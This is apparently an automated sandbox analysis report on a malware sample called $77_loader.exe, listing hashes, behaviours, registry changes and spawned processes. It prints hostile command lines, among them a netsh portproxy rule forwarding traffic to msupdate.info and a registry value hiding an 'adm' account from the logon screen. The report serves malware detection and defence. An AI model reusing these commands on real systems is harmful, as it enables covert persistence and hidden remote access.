Analysis
max time kernel: 146s
max time network: 166s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 10-05-2022 05:35
Static task: static1
Behavioral task: behavioral1
  Sample: $77_loader.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: $77_loader.exe
  Resource: win10v2004-20220414-en
General
Target: $77_loader.exe
Size: 397KB
MD5: aff57ee1a4f3731c2036046910f78fb4
SHA1: ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256: 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512: 5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f
Malware Config
Signatures
- Sets file execution options in registry (2 TTPs)
- Modifies WinLogon (2 TTPs, 3 IoCs)
  Processes: $77_loader.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | $77_loader.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | $77_loader.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | $77_loader.exe
- Modifies powershell logging option (1 TTP)
- Drops file in Windows directory (2 IoCs)
  Processes: $77_loader.exe
  description | ioc | process
  File created | C:\Windows\SoftwareDistribution\config.xml | $77_loader.exe
  File opened for modification | C:\Windows\SoftwareDistribution\config.xml | $77_loader.exe
- Gathers network information (2 TTPs, 3 IoCs)
  Uses commandline utility to view network configuration.
  Processes: NETSTAT.EXE, NETSTAT.EXE, NETSTAT.EXE
  pid | process
  1852 | NETSTAT.EXE
  2976 | NETSTAT.EXE
  4872 | NETSTAT.EXE
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: $77_loader.exe
  pid | process
  2800 | $77_loader.exe
  2800 | $77_loader.exe
  2800 | $77_loader.exe
  2800 | $77_loader.exe
  2800 | $77_loader.exe
  2800 | $77_loader.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: $77_loader.exe, msiexec.exe, NETSTAT.EXE, NETSTAT.EXE, NETSTAT.EXE
  description | pid | process
  Token: SeDebugPrivilege | 2800 | $77_loader.exe
  Token: SeSecurityPrivilege | 4052 | msiexec.exe
  Token: SeDebugPrivilege | 1852 | NETSTAT.EXE
  Token: SeDebugPrivilege | 2976 | NETSTAT.EXE
  Token: SeDebugPrivilege | 4872 | NETSTAT.EXE
- Suspicious use of WriteProcessMemory (24 IoCs)
  Processes: $77_loader.exe, csc.exe
  description | pid | process | target process
  PID 2800 wrote to memory of 3992 | 2800 | $77_loader.exe | csc.exe
  PID 2800 wrote to memory of 3992 | 2800 | $77_loader.exe | csc.exe
  PID 3992 wrote to memory of 4708 | 3992 | csc.exe | cvtres.exe
  PID 3992 wrote to memory of 4708 | 3992 | csc.exe | cvtres.exe
  PID 2800 wrote to memory of 3132 | 2800 | $77_loader.exe | chcp.com
  PID 2800 wrote to memory of 3132 | 2800 | $77_loader.exe | chcp.com
  PID 2800 wrote to memory of 3612 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 3612 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 1852 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 1852 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 2976 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 2976 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 4872 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 4872 | 2800 | $77_loader.exe | NETSTAT.EXE
  PID 2800 wrote to memory of 4360 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 4360 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 2304 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 2304 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 4072 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 4072 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 784 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 784 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 3184 | 2800 | $77_loader.exe | netsh.exe
  PID 2800 wrote to memory of 3184 | 2800 | $77_loader.exe | netsh.exe
Processes (indentation shows parent/child depth)

C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
  PID: 2800
  - Modifies WinLogon
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lymd7jqs.cmdline"
    PID: 3992
    - Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES675B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC675A.tmp"
      PID: 4708

  C:\Windows\system32\chcp.com
    Command line: "C:\Windows\system32\chcp.com" 437
    PID: 3132

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
    PID: 3612

  C:\Windows\system32\NETSTAT.EXE
    Command line: "C:\Windows\system32\NETSTAT.EXE" -na
    PID: 1852
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\NETSTAT.EXE
    Command line: "C:\Windows\system32\NETSTAT.EXE" -na
    PID: 2976
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\NETSTAT.EXE
    Command line: "C:\Windows\system32\NETSTAT.EXE" -na
    PID: 4872
    - Gathers network information
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy reset
    PID: 4360

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
    PID: 2304

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
    PID: 4072

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
    PID: 784

  C:\Windows\system32\netsh.exe
    Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
    PID: 3184

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  PID: 4052
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 1KB
  MD5: 90c1ba1a3c1fdfdf782324d09293d9fc
  SHA1: 564417a0c3f22b815a64bebdd772cd8c969dffae
  SHA256: c9e83e06df6ee9e765710ea2d795033278a64ab5309bc954b0b6c2c241aeb6a5
  SHA512: 3709613bf6103c9004cfd806a41148532775640c5416606b9ac3f40ed252cbc1f69f8472485428bcdbb87119d6a8521ed3e9d0c664083f8772f568bd9b5aad19
- Filesize: 3KB
  MD5: 8ee2b8ba7614c39c6a430e9885e48b1a
  SHA1: 7f7f0a63e1b12495151cf9b2d71009fccc26ed4b
  SHA256: c561f309d93b230b3af0cb24dd4481fcf4cf7394bf4310e9d1dd9512cd8f8e06
  SHA512: af72a4cf19726b936723b63f572a1ab97c0384a3cd331155b0d0c35eed42378c422364ff6fa29a7be7b4e3038cd882fafd576adcb1b0585d0f718b50eb82c845
- Filesize: 11KB
  MD5: 8154d6ba5c87c0aec23aa9c8b66a79b7
  SHA1: a6456adc313e11a2020f055505212494082193f6
  SHA256: 9700334d25dc85f4ca4c10398e2e64acb614da2a775bbacc88ac6789035e9f4d
  SHA512: f39a680d84ab6b5dd3787b62f1f0c738c64e71c5ae0cc0e4f78eb71bb65c05ba52a794d5fcbabddf162e953047bc161d9db460abb9638aa9c4d08a2a65faae80
- Filesize: 652B
  MD5: 326135b06eec7119e84f4086cd60ae86
  SHA1: 1ec6202e25007b29bba6323642dc211943ba63a2
  SHA256: 78bc3c4ee980df9b772c99c0a0f92ca34b505cb3f28b67510dc498777919b3b8
  SHA512: 1644eddcf5c4f96260fc73ea1be43ab836d03d3cd9e99a3b31fbaaf2f10c4c82f5225f5aafeba13122fa7c875d0c43b5e04cc79cc7267dcd4e0474102a979f16
- Filesize: 447B
  MD5: 1640a04633fee0dfdc7e22c4f4063bf6
  SHA1: 3cb525c47b5dd37f8ee45b034c9452265fba5476
  SHA256: 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
  SHA512: 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
- Filesize: 309B
  MD5: 32440e8a0dc28a1984607b2153ae985a
  SHA1: e46bf60b542abe1286d429f37ff4a34bc106767d
  SHA256: df8fcf31d33ba3d74b2b12808019d54a11a634348844e01ea30475f64ea660e4
  SHA512: 8211bbab1b9a1ff9e683e676f5c50e415917ded44445ebedb859b47c2bd229ecbc7a0b82bbd0608598ab7564d97884f5c8457b170ab824d77a688a59b9860c93